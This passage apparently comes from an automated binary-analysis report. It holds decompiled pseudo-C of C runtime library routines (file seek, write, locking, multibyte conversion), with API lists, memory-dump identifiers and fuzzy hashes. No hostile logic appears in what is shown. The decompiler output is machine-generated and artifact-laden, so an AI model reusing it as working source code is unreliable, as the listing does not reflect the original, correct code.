                                                                                                                        												L39:
                                                                                                                        												_t66 =  &_v12;
                                                                                                                        												 *_t66 = _v12 - _a4;
                                                                                                                        												__eflags =  *_t66;
                                                                                                                        												goto L40;
                                                                                                                        											}
                                                                                                                        											_push(2);
                                                                                                                        											_push(0);
                                                                                                                        											_push(_v8);
                                                                                                                        											__eflags = E00414A27(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                                                                        											if(__eflags != 0) {
                                                                                                                        												_push(0);
                                                                                                                        												_push(_v12);
                                                                                                                        												_push(_v8);
                                                                                                                        												_t81 = E00414A27(_t90, _t99, _t104, _t111, __eflags);
                                                                                                                        												__eflags = _t81;
                                                                                                                        												if(_t81 >= 0) {
                                                                                                                        													_t82 = 0x200;
                                                                                                                        													__eflags = _a4 - 0x200;
                                                                                                                        													if(_a4 > 0x200) {
                                                                                                                        														L35:
                                                                                                                        														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                                                                        														L36:
                                                                                                                        														_a4 = _t82;
                                                                                                                        														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                                                                        														L37:
                                                                                                                        														if(__eflags != 0) {
                                                                                                                        															_t63 =  &_a4;
                                                                                                                        															 *_t63 = _a4 + 1;
                                                                                                                        															__eflags =  *_t63;
                                                                                                                        														}
                                                                                                                        														goto L39;
                                                                                                                        													}
                                                                                                                        													_t94 =  *(_t104 + 0xc);
                                                                                                                        													__eflags = _t94 & 0x00000008;
                                                                                                                        													if((_t94 & 0x00000008) == 0) {
                                                                                                                        														goto L35;
                                                                                                                        													}
                                                                                                                        													__eflags = _t94 & 0x00000400;
                                                                                                                        													if((_t94 & 0x00000400) == 0) {
                                                                                                                        														goto L36;
                                                                                                                        													}
                                                                                                                        													goto L35;
                                                                                                                        												}
                                                                                                                        												L31:
                                                                                                                        												_t75 = _t81 | 0xffffffff;
                                                                                                                        												goto L41;
                                                                                                                        											}
                                                                                                                        											_t84 =  *(_t104 + 8);
                                                                                                                        											_t96 = _a4 + _t84;
                                                                                                                        											while(1) {
                                                                                                                        												__eflags = _t84 - _t96;
                                                                                                                        												if(_t84 >= _t96) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												__eflags =  *_t84 - 0xa;
                                                                                                                        												if( *_t84 == 0xa) {
                                                                                                                        													_t44 =  &_a4;
                                                                                                                        													 *_t44 = _a4 + 1;
                                                                                                                        													__eflags =  *_t44;
                                                                                                                        												}
                                                                                                                        												_t84 = _t84 + 1;
                                                                                                                        												__eflags = _t84;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                                                                        											goto L37;
                                                                                                                        										}
                                                                                                                        										_v16 = _t87;
                                                                                                                        										goto L40;
                                                                                                                        									}
                                                                                                                        									_t75 = _v16;
                                                                                                                        									goto L41;
                                                                                                                        								}
                                                                                                                        								_t81 = E0040F27B(__eflags);
                                                                                                                        								 *_t81 = 0x16;
                                                                                                                        								goto L31;
                                                                                                                        							}
                                                                                                                        							_t102 =  *((intOrPtr*)(0x4242a0 + (_v8 >> 5) * 4));
                                                                                                                        							_t114 = (_v8 & 0x0000001f) << 6;
                                                                                                                        							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                                                                        							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                                                                        								goto L15;
                                                                                                                        							}
                                                                                                                        							_t103 = _t92;
                                                                                                                        							__eflags = _t103 - _t73;
                                                                                                                        							if(_t103 >= _t73) {
                                                                                                                        								goto L15;
                                                                                                                        							}
                                                                                                                        							_t115 = _t73;
                                                                                                                        							do {
                                                                                                                        								__eflags =  *_t103 - 0xa;
                                                                                                                        								if( *_t103 == 0xa) {
                                                                                                                        									_v16 = _v16 + 1;
                                                                                                                        									_t87 = 0;
                                                                                                                        									__eflags = 0;
                                                                                                                        								}
                                                                                                                        								_t103 = _t103 + 1;
                                                                                                                        								__eflags = _t103 - _t115;
                                                                                                                        							} while (_t103 < _t115);
                                                                                                                        							goto L15;
                                                                                                                        						}
                                                                                                                        						return _t71 -  *(_t104 + 4);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t86 = E0040F27B(_t121);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				 *_t86 = 0x16;
                                                                                                                        				_t71 = E00411AE6(__edx, _t104, __esi);
                                                                                                                        				goto L2;
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • __fileno.LIBCMT ref: 0040FA3C
                                                                                                                        • __locking.LIBCMT ref: 0040FA51
                                                                                                                          • Part of subcall function 0040F27B: __getptd_noexit.LIBCMT ref: 0040F27B
                                                                                                                          • Part of subcall function 00411AE6: __decode_pointer.LIBCMT ref: 00411AF1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2395185920-0
                                                                                                                        • Opcode ID: 140d85921706fc2f895eb291010658fff98a80f5cba46298b4189946b415ee23
                                                                                                                        • Instruction ID: 73422a71fbb45345cbb10fac6a759ac1675b49add2664a2055bfecdbe2158fd7
                                                                                                                        • Opcode Fuzzy Hash: 140d85921706fc2f895eb291010658fff98a80f5cba46298b4189946b415ee23
                                                                                                                        • Instruction Fuzzy Hash: 3B51C371E00204ABDB20CF69C990B59BBB1AF45354F14817BE919B7BC1D738AE49CF89
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E0040ED64(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                        				signed int _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				signed int _t59;
                                                                                                                        				intOrPtr* _t61;
                                                                                                                        				signed int _t63;
                                                                                                                        				void* _t68;
                                                                                                                        				signed int _t69;
                                                                                                                        				signed int _t72;
                                                                                                                        				signed int _t74;
                                                                                                                        				signed int _t75;
                                                                                                                        				signed int _t77;
                                                                                                                        				signed int _t78;
                                                                                                                        				signed int _t81;
                                                                                                                        				signed int _t82;
                                                                                                                        				signed int _t84;
                                                                                                                        				signed int _t88;
                                                                                                                        				signed int _t97;
                                                                                                                        				signed int _t98;
                                                                                                                        				signed int _t99;
                                                                                                                        				intOrPtr* _t100;
                                                                                                                        				void* _t101;
                                                                                                                        
                                                                                                                        				_t90 = __edx;
                                                                                                                        				if(_a8 == 0 || _a12 == 0) {
                                                                                                                        					L4:
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t100 = _a16;
                                                                                                                        					_t105 = _t100;
                                                                                                                        					if(_t100 != 0) {
                                                                                                                        						_t82 = _a4;
                                                                                                                        						__eflags = _t82;
                                                                                                                        						if(__eflags == 0) {
                                                                                                                        							goto L3;
                                                                                                                        						}
                                                                                                                        						_t63 = _t59 | 0xffffffff;
                                                                                                                        						_t90 = _t63 % _a8;
                                                                                                                        						__eflags = _a12 - _t63 / _a8;
                                                                                                                        						if(__eflags > 0) {
                                                                                                                        							goto L3;
                                                                                                                        						}
                                                                                                                        						_t97 = _a8 * _a12;
                                                                                                                        						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                                                                        						_v8 = _t82;
                                                                                                                        						_v16 = _t97;
                                                                                                                        						_t81 = _t97;
                                                                                                                        						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                                                                        							_v12 = 0x1000;
                                                                                                                        						} else {
                                                                                                                        							_v12 =  *(_t100 + 0x18);
                                                                                                                        						}
                                                                                                                        						__eflags = _t97;
                                                                                                                        						if(_t97 == 0) {
                                                                                                                        							L32:
                                                                                                                        							return _a12;
                                                                                                                        						} else {
                                                                                                                        							do {
                                                                                                                        								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                                                                        								__eflags = _t84;
                                                                                                                        								if(_t84 == 0) {
                                                                                                                        									L18:
                                                                                                                        									__eflags = _t81 - _v12;
                                                                                                                        									if(_t81 < _v12) {
                                                                                                                        										_t68 = E00412350(_t90, _t97,  *_v8, _t100);
                                                                                                                        										__eflags = _t68 - 0xffffffff;
                                                                                                                        										if(_t68 == 0xffffffff) {
                                                                                                                        											L34:
                                                                                                                        											_t69 = _t97;
                                                                                                                        											L35:
                                                                                                                        											return (_t69 - _t81) / _a8;
                                                                                                                        										}
                                                                                                                        										_v8 = _v8 + 1;
                                                                                                                        										_t72 =  *(_t100 + 0x18);
                                                                                                                        										_t81 = _t81 - 1;
                                                                                                                        										_v12 = _t72;
                                                                                                                        										__eflags = _t72;
                                                                                                                        										if(_t72 <= 0) {
                                                                                                                        											_v12 = 1;
                                                                                                                        										}
                                                                                                                        										goto L31;
                                                                                                                        									}
                                                                                                                        									__eflags = _t84;
                                                                                                                        									if(_t84 == 0) {
                                                                                                                        										L21:
                                                                                                                        										__eflags = _v12;
                                                                                                                        										_t98 = _t81;
                                                                                                                        										if(_v12 != 0) {
                                                                                                                        											_t75 = _t81;
                                                                                                                        											_t90 = _t75 % _v12;
                                                                                                                        											_t98 = _t98 - _t75 % _v12;
                                                                                                                        											__eflags = _t98;
                                                                                                                        										}
                                                                                                                        										_push(_t98);
                                                                                                                        										_push(_v8);
                                                                                                                        										_push(E00412CC3(_t90, _t98, _t100));
                                                                                                                        										_t74 = E00412BE7(_t81, _t90, _t98, _t100, __eflags);
                                                                                                                        										_t101 = _t101 + 0xc;
                                                                                                                        										__eflags = _t74 - 0xffffffff;
                                                                                                                        										if(_t74 == 0xffffffff) {
                                                                                                                        											L36:
                                                                                                                        											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                        											_t69 = _v16;
                                                                                                                        											goto L35;
                                                                                                                        										} else {
                                                                                                                        											_t88 = _t98;
                                                                                                                        											__eflags = _t74 - _t98;
                                                                                                                        											if(_t74 <= _t98) {
                                                                                                                        												_t88 = _t74;
                                                                                                                        											}
                                                                                                                        											_v8 = _v8 + _t88;
                                                                                                                        											_t81 = _t81 - _t88;
                                                                                                                        											__eflags = _t74 - _t98;
                                                                                                                        											if(_t74 < _t98) {
                                                                                                                        												goto L36;
                                                                                                                        											} else {
                                                                                                                        												L27:
                                                                                                                        												_t97 = _v16;
                                                                                                                        												goto L31;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									_t77 = E0040F4BB(_t100);
                                                                                                                        									__eflags = _t77;
                                                                                                                        									if(_t77 != 0) {
                                                                                                                        										goto L34;
                                                                                                                        									}
                                                                                                                        									goto L21;
                                                                                                                        								}
                                                                                                                        								_t78 =  *(_t100 + 4);
                                                                                                                        								__eflags = _t78;
                                                                                                                        								if(__eflags == 0) {
                                                                                                                        									goto L18;
                                                                                                                        								}
                                                                                                                        								if(__eflags < 0) {
                                                                                                                        									_t48 = _t100 + 0xc;
                                                                                                                        									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                        									__eflags =  *_t48;
                                                                                                                        									goto L34;
                                                                                                                        								}
                                                                                                                        								_t99 = _t81;
                                                                                                                        								__eflags = _t81 - _t78;
                                                                                                                        								if(_t81 >= _t78) {
                                                                                                                        									_t99 = _t78;
                                                                                                                        								}
                                                                                                                        								E0040E0C0(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                                                                        								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                                                                        								 *_t100 =  *_t100 + _t99;
                                                                                                                        								_t101 = _t101 + 0xc;
                                                                                                                        								_t81 = _t81 - _t99;
                                                                                                                        								_v8 = _v8 + _t99;
                                                                                                                        								goto L27;
                                                                                                                        								L31:
                                                                                                                        								__eflags = _t81;
                                                                                                                        							} while (_t81 != 0);
                                                                                                                        							goto L32;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L3:
                                                                                                                        					_t61 = E0040F27B(_t105);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					 *_t61 = 0x16;
                                                                                                                        					E00411AE6(_t90, 0, _t100);
                                                                                                                        					goto L4;
                                                                                                                        				}
                                                                                                                        			}





























                                                                                                                        0x0040edfe
                                                                                                                        0x0040ee00
                                                                                                                        0x0040ee02
                                                                                                                        0x0040ee02
                                                                                                                        0x0040ee0a
                                                                                                                        0x0040ee0f
                                                                                                                        0x0040ee12
                                                                                                                        0x0040ee14
                                                                                                                        0x0040ee17
                                                                                                                        0x0040ee19
                                                                                                                        0x00000000
                                                                                                                        0x0040ee9b
                                                                                                                        0x0040ee9b
                                                                                                                        0x0040ee9b
                                                                                                                        0x00000000
                                                                                                                        0x0040ede4
                                                                                                                        0x0040edde
                                                                                                                        0x0040ed82
                                                                                                                        0x0040ed82
                                                                                                                        0x0040ed87
                                                                                                                        0x0040ed88
                                                                                                                        0x0040ed89
                                                                                                                        0x0040ed8a
                                                                                                                        0x0040ed8b
                                                                                                                        0x0040ed8c
                                                                                                                        0x0040ed92
                                                                                                                        0x00000000
                                                                                                                        0x0040ed97

                                                                                                                        APIs
                                                                                                                        • __flush.LIBCMT ref: 0040EE28
                                                                                                                        • __fileno.LIBCMT ref: 0040EE48
                                                                                                                        • __locking.LIBCMT ref: 0040EE4F
                                                                                                                        • __flsbuf.LIBCMT ref: 0040EE7A
                                                                                                                          • Part of subcall function 0040F27B: __getptd_noexit.LIBCMT ref: 0040F27B
                                                                                                                          • Part of subcall function 00411AE6: __decode_pointer.LIBCMT ref: 00411AF1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3240763771-0
                                                                                                                        • Opcode ID: a37a9db44f56a59372263b5fc7ef4f83e440b6ad469a9998af22127d97e2e595
                                                                                                                        • Instruction ID: cce06177d790619f16dce141d26e64fa5285875700a8a2fd0a33240c7c9fa16b
                                                                                                                        • Opcode Fuzzy Hash: a37a9db44f56a59372263b5fc7ef4f83e440b6ad469a9998af22127d97e2e595
                                                                                                                        • Instruction Fuzzy Hash: 9D41C931A00609DBDB249F67C98459FBBB5EF80360F24893EE455A72C0D778DE61DB88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 97%
                                                                                                                        			E00408ED0(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				signed int _t30;
                                                                                                                        				signed int _t31;
                                                                                                                        				signed int _t32;
                                                                                                                        				signed int _t33;
                                                                                                                        				signed int _t35;
                                                                                                                        				signed int _t39;
                                                                                                                        				void* _t42;
                                                                                                                        				intOrPtr _t43;
                                                                                                                        				void* _t45;
                                                                                                                        				signed int _t48;
                                                                                                                        				signed int* _t53;
                                                                                                                        				void* _t54;
                                                                                                                        				void* _t55;
                                                                                                                        				void* _t57;
                                                                                                                        
                                                                                                                        				_t54 = __ebp;
                                                                                                                        				_t45 = __edx;
                                                                                                                        				_t42 = __ebx;
                                                                                                                        				_t53 = _a4;
                                                                                                                        				if(_t53 == 0) {
                                                                                                                        					L40:
                                                                                                                        					_t31 = _t30 | 0xffffffff;
                                                                                                                        					__eflags = _t31;
                                                                                                                        					return _t31;
                                                                                                                        				} else {
                                                                                                                        					_t43 = _a12;
                                                                                                                        					if(_t43 == 2) {
                                                                                                                        						goto L40;
                                                                                                                        					} else {
                                                                                                                        						_t30 = _t53[0xe];
                                                                                                                        						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                                                                        							goto L40;
                                                                                                                        						} else {
                                                                                                                        							_t48 = _a8;
                                                                                                                        							if(_t53[0x17] != 0x77) {
                                                                                                                        								__eflags = _t43 - 1;
                                                                                                                        								if(_t43 == 1) {
                                                                                                                        									_t48 = _t48 + _t53[0x1a];
                                                                                                                        									__eflags = _t48;
                                                                                                                        								}
                                                                                                                        								__eflags = _t48;
                                                                                                                        								if(_t48 < 0) {
                                                                                                                        									goto L39;
                                                                                                                        								} else {
                                                                                                                        									__eflags = _t53[0x16];
                                                                                                                        									if(__eflags == 0) {
                                                                                                                        										_t33 = _t53[0x1a];
                                                                                                                        										__eflags = _t48 - _t33;
                                                                                                                        										if(_t48 < _t33) {
                                                                                                                        											_t30 = E004086C0(_t42, _t54, _t53);
                                                                                                                        											_t55 = _t55 + 4;
                                                                                                                        											__eflags = _t30;
                                                                                                                        											if(_t30 < 0) {
                                                                                                                        												goto L39;
                                                                                                                        											} else {
                                                                                                                        												goto L27;
                                                                                                                        											}
                                                                                                                        										} else {
                                                                                                                        											_t48 = _t48 - _t33;
                                                                                                                        											L27:
                                                                                                                        											__eflags = _t48;
                                                                                                                        											if(_t48 == 0) {
                                                                                                                        												L38:
                                                                                                                        												return _t53[0x1a];
                                                                                                                        											} else {
                                                                                                                        												__eflags = _t53[0x12];
                                                                                                                        												if(_t53[0x12] != 0) {
                                                                                                                        													L30:
                                                                                                                        													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                                        													if(_t53[0x1b] != 0xffffffff) {
                                                                                                                        														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                                        														_t48 = _t48 - 1;
                                                                                                                        														__eflags = _t53[0x1c];
                                                                                                                        														_t53[0x1b] = 0xffffffff;
                                                                                                                        														if(_t53[0x1c] != 0) {
                                                                                                                        															_t53[0xe] = 1;
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        													__eflags = _t48;
                                                                                                                        													if(_t48 <= 0) {
                                                                                                                        														goto L38;
                                                                                                                        													} else {
                                                                                                                        														while(1) {
                                                                                                                        															_t35 = 0x4000;
                                                                                                                        															__eflags = _t48 - 0x4000;
                                                                                                                        															if(_t48 < 0x4000) {
                                                                                                                        																_t35 = _t48;
                                                                                                                        															}
                                                                                                                        															_t30 = E00408BF0(_t45, _t53, _t53[0x12], _t35);
                                                                                                                        															_t55 = _t55 + 0xc;
                                                                                                                        															__eflags = _t30;
                                                                                                                        															if(_t30 <= 0) {
                                                                                                                        																goto L39;
                                                                                                                        															}
                                                                                                                        															_t48 = _t48 - _t30;
                                                                                                                        															__eflags = _t48;
                                                                                                                        															if(_t48 > 0) {
                                                                                                                        																continue;
                                                                                                                        															} else {
                                                                                                                        																goto L38;
                                                                                                                        															}
                                                                                                                        															goto L41;
                                                                                                                        														}
                                                                                                                        														goto L39;
                                                                                                                        													}
                                                                                                                        												} else {
                                                                                                                        													_t30 = E0040DFE9(_t42, _t45, _t48, 0x4000);
                                                                                                                        													_t55 = _t55 + 4;
                                                                                                                        													_t53[0x12] = _t30;
                                                                                                                        													__eflags = _t30;
                                                                                                                        													if(_t30 == 0) {
                                                                                                                        														goto L39;
                                                                                                                        													} else {
                                                                                                                        														goto L30;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										_push(0);
                                                                                                                        										_push(_t48);
                                                                                                                        										_push(_t53[0x10]);
                                                                                                                        										_t53[0x1b] = 0xffffffff;
                                                                                                                        										_t53[1] = 0;
                                                                                                                        										 *_t53 = _t53[0x11];
                                                                                                                        										_t30 = E0040F72B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                                        										__eflags = _t30;
                                                                                                                        										if(_t30 < 0) {
                                                                                                                        											goto L39;
                                                                                                                        										} else {
                                                                                                                        											_t53[0x1a] = _t48;
                                                                                                                        											_t53[0x19] = _t48;
                                                                                                                        											return _t48;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								if(_t43 == 0) {
                                                                                                                        									_t48 = _t48 - _t53[0x19];
                                                                                                                        								}
                                                                                                                        								if(_t48 < 0) {
                                                                                                                        									L39:
                                                                                                                        									_t32 = _t30 | 0xffffffff;
                                                                                                                        									__eflags = _t32;
                                                                                                                        									return _t32;
                                                                                                                        								} else {
                                                                                                                        									if(_t53[0x11] != 0) {
                                                                                                                        										L11:
                                                                                                                        										if(_t48 <= 0) {
                                                                                                                        											L17:
                                                                                                                        											return _t53[0x19];
                                                                                                                        										} else {
                                                                                                                        											while(1) {
                                                                                                                        												_t39 = 0x4000;
                                                                                                                        												if(_t48 < 0x4000) {
                                                                                                                        													_t39 = _t48;
                                                                                                                        												}
                                                                                                                        												_t30 = E00408430(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                                        												_t55 = _t55 + 0xc;
                                                                                                                        												if(_t30 == 0) {
                                                                                                                        													goto L39;
                                                                                                                        												}
                                                                                                                        												_t48 = _t48 - _t30;
                                                                                                                        												if(_t48 > 0) {
                                                                                                                        													continue;
                                                                                                                        												} else {
                                                                                                                        													goto L17;
                                                                                                                        												}
                                                                                                                        												goto L41;
                                                                                                                        											}
                                                                                                                        											goto L39;
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										_t30 = E0040DFE9(_t42, _t45, _t48, 0x4000);
                                                                                                                        										_t57 = _t55 + 4;
                                                                                                                        										_t53[0x11] = _t30;
                                                                                                                        										if(_t30 == 0) {
                                                                                                                        											goto L39;
                                                                                                                        										} else {
                                                                                                                        											E0040E430(_t48, _t30, 0, 0x4000);
                                                                                                                        											_t55 = _t57 + 0xc;
                                                                                                                        											goto L11;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L41:
                                                                                                                        			}




















                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: _fseek_malloc_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 208892515-0
                                                                                                                        • Opcode ID: 2f34fd9539ec26f1d2d99c47131393a8ed76af65d5b8681582b39209b64c9892
                                                                                                                        • Instruction ID: dab0bcb43c4b05336bba1bdf2d398b5082bebd3df36d34df690b04089cdca156
                                                                                                                        • Opcode Fuzzy Hash: 2f34fd9539ec26f1d2d99c47131393a8ed76af65d5b8681582b39209b64c9892
                                                                                                                        • Instruction Fuzzy Hash: 184184B2600B024AD6309A2EA90171772E69FC0714F140A3EE6E6A67D3EB7DEC458759
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004177D0(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                        				char _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				char _v20;
                                                                                                                        				char _t43;
                                                                                                                        				char _t46;
                                                                                                                        				signed int _t53;
                                                                                                                        				signed int _t54;
                                                                                                                        				intOrPtr _t56;
                                                                                                                        				int _t57;
                                                                                                                        				int _t58;
                                                                                                                        				signed short* _t59;
                                                                                                                        				short* _t60;
                                                                                                                        				int _t65;
                                                                                                                        				char* _t72;
                                                                                                                        
                                                                                                                        				_t72 = _a8;
                                                                                                                        				if(_t72 == 0 || _a12 == 0) {
                                                                                                                        					L5:
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					if( *_t72 != 0) {
                                                                                                                        						E00411D54( &_v20, _a16);
                                                                                                                        						_t43 = _v20;
                                                                                                                        						__eflags =  *(_t43 + 0x14);
                                                                                                                        						if( *(_t43 + 0x14) != 0) {
                                                                                                                        							_t46 = E00417901( *_t72 & 0x000000ff,  &_v20);
                                                                                                                        							__eflags = _t46;
                                                                                                                        							if(_t46 == 0) {
                                                                                                                        								__eflags = _a4;
                                                                                                                        								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                        								if(__eflags != 0) {
                                                                                                                        									L10:
                                                                                                                        									__eflags = _v8;
                                                                                                                        									if(_v8 != 0) {
                                                                                                                        										_t53 = _v12;
                                                                                                                        										_t11 = _t53 + 0x70;
                                                                                                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                        										__eflags =  *_t11;
                                                                                                                        									}
                                                                                                                        									return 1;
                                                                                                                        								}
                                                                                                                        								L21:
                                                                                                                        								_t54 = E0040F27B(__eflags);
                                                                                                                        								 *_t54 = 0x2a;
                                                                                                                        								__eflags = _v8;
                                                                                                                        								if(_v8 != 0) {
                                                                                                                        									_t54 = _v12;
                                                                                                                        									_t33 = _t54 + 0x70;
                                                                                                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                        									__eflags =  *_t33;
                                                                                                                        								}
                                                                                                                        								return _t54 | 0xffffffff;
                                                                                                                        							}
                                                                                                                        							_t56 = _v20;
                                                                                                                        							_t65 =  *(_t56 + 0xac);
                                                                                                                        							__eflags = _t65 - 1;
                                                                                                                        							if(_t65 <= 1) {
                                                                                                                        								L17:
                                                                                                                        								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                        								if(__eflags < 0) {
                                                                                                                        									goto L21;
                                                                                                                        								}
                                                                                                                        								__eflags = _t72[1];
                                                                                                                        								if(__eflags == 0) {
                                                                                                                        									goto L21;
                                                                                                                        								}
                                                                                                                        								L19:
                                                                                                                        								_t57 =  *(_t56 + 0xac);
                                                                                                                        								__eflags = _v8;
                                                                                                                        								if(_v8 == 0) {
                                                                                                                        									return _t57;
                                                                                                                        								}
                                                                                                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                        								return _t57;
                                                                                                                        							}
                                                                                                                        							__eflags = _a12 - _t65;
                                                                                                                        							if(_a12 < _t65) {
                                                                                                                        								goto L17;
                                                                                                                        							}
                                                                                                                        							__eflags = _a4;
                                                                                                                        							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                        							__eflags = _t58;
                                                                                                                        							_t56 = _v20;
                                                                                                                        							if(_t58 != 0) {
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							goto L17;
                                                                                                                        						}
                                                                                                                        						_t59 = _a4;
                                                                                                                        						__eflags = _t59;
                                                                                                                        						if(_t59 != 0) {
                                                                                                                        							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                        						}
                                                                                                                        						goto L10;
                                                                                                                        					} else {
                                                                                                                        						_t60 = _a4;
                                                                                                                        						if(_t60 != 0) {
                                                                                                                        							 *_t60 = 0;
                                                                                                                        						}
                                                                                                                        						goto L5;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}


















                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00417804
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00417838
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?), ref: 00417869
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?), ref: 004178D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: 6222122cbe0cb2f68c18663a92cb4752c6003c1a4542f4be2abdf672c3a96928
                                                                                                                        • Instruction ID: bbf7777714f6dd507eda31f5512cc90a11f0c64677eeb72866c0302a65969965
                                                                                                                        • Opcode Fuzzy Hash: 6222122cbe0cb2f68c18663a92cb4752c6003c1a4542f4be2abdf672c3a96928
                                                                                                                        • Instruction Fuzzy Hash: F631C031A08256EFDB20EF68C8849EA3BB5FF01311F15856AE4758B291E334EDC1DB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __recalloc.LIBCMT ref: 00402C98
                                                                                                                        • _calloc.LIBCMT ref: 00402CD1
                                                                                                                          • Part of subcall function 00401030: RaiseException.KERNEL32(-000000013F130D15,00000001,00000000,00000000,00402D58,8007000E,00000001,?,00402E76,?,?,?,00000080,?,?), ref: 0040101C
                                                                                                                          • Part of subcall function 00401030: GetLastError.KERNEL32(?,?,?,?,00402F36,004023A6,00000003,?,004023A6,00F3F310), ref: 00401030
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                        • String ID: !@
